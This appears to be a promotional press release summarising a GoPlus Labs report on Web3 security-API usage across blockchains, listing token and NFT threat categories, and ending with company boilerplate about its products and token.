The report shows there is rising demand for better Web3 security solutions, with GoPlus revealing that its Token Risk API saw a rapid increase in utilization from November 2023, with some months witnessing peaks of over 20 million calls per day.  This suggests that the crypto industry is collectively shifting towards pre-emptive risk identification and mitigation, driven by the evolving and intensifying landscape of security threats. 

These increases were mirrored by similar usage spikes in GoPlus’s other API modules. For instance, usage of its NFT API spiked between Dec. 2022 and Feb. 2023, and then several times again between March and May 2023, before stabilizing, followed by a sustained period of much steadier growth. These usage trends mirror the growing adoption of NFTs and the corresponding need for tools that can accurately assess the risks associated with these digital assets.

****Evolving Threat Landscape****

A closer analysis of the API usage data illustrated a significant fluctuation in the presence of “high-risk” tokens, reflecting a threat landscape that’s just as volatile as the crypto industry itself. The majority of these high-risk tokens were identified as being either “blacklisted” or “honeypots”, although many other kinds of threats were identified, illustrating the evolving tactics used by hackers and scammers in the industry. The report also found an exponential increase in threats associated with NFTs, such as privileged operations (burn and minting), restricted approvals, self-destruct mechanisms and unauthorized transfers.

The threat-related insights demonstrate the need for Web3 projects to employ more dynamic, robust and adaptable security strategies and countermeasures to deal with the evolving threat landscape, as well as the need for education and collaboration to increase awareness of these threats and find better ways to mitigate them.

****Top Ecosystems & Threats****

The comprehensive study also highlighted the differing levels of user engagement and **security concerns across blockchains**, providing perspective on the unique challenges and risks faced by each ecosystem. 

BNB Chain emerged as the most prominent user of GoPlus’s APIs, being queried more than 92.7 million times during the research period. This reflects Binance’s laudable achievement in fostering a large community that’s united in its determination to identify and proactively mitigate security risks such as token vulnerabilities and scams.

Ethereum was the second-most popular chain to leverage GoPlus, with users querying its APIs 84 million times, highlighting both the extent of its user base and its vigilance against vulnerabilities and scams. Meanwhile, Polygon also stood out with almost 9.8 million queries during the period. This high level of adoption in the much smaller Polygon community illustrates the strong emphasis it places on scaling security solutions for the Web3 industry. 

Other insights from the report include the top ten token risks faced by the crypto industry today, with further analysis uncovering ten tokens with characteristics that mark them out as being “particularly malicious”, and also the top ten NFT collections that could be perceived as risky, due to their close association with phishing scams.  

****The Importance Of User Security Insights****

The GoPlus report provides valuable insights into aspects such as user engagement, preferences and the nature of the evolving threats in Web3, which can be essential for stakeholders to make more informed decisions and mitigate the risks they face. 

Perhaps the most significant finding is that the report underlines the critical importance Web3 security data can play in helping the industry address the evolving risk landscape. As the Web3 ecosystem grows and evolves, the need for comprehensive security data will become all the more vital, helping dApp developers protect their users, while educating users on how to protect themselves.  

****About GoPlus Labs****

**GoPlus Labs** is revolutionizing Web3 security by offering a transparent, User Security Network with permissionless security data. It provides a User Security Module as a Service to any blockchain, utilizing advanced AI for comprehensive threat detection.

Notably, its security data infrastructure has seen a massive usage increase, the user security data usage has grown 5000x from 2022 to now, with daily data API calls 21M.

SecwareX, launched in March 2024, quickly gained significant traction, showcasing high user trust. Within its first two weeks, it attracted over 400,000 users, including more than 30,000 premium (paid) users, highlighting its immediate impact and user trust.

GoPlus enhances Web3 user security through broad support for over 20 chains, collaboration with RaaS and Layer2 partners like Altlayer, zkSync, and Manta, and the introduction of innovative products like the “Secscan” security engine and Secware Middleware. These advancements facilitate a more open data and computing layer, moving towards gradual decentralization.

Goplus enhances Web3 user security and promotes decentralization by motivating user participation with its token system. The Goplus Token will act as a “gas fee,” necessary to reinforce the user security network and expand its utility. Moreover, it encourages users to become SecWare Service Providers, Data Providers, and Computing Node Providers. By contributing to the network, these participants can earn Goplus Tokens.

Tag

#git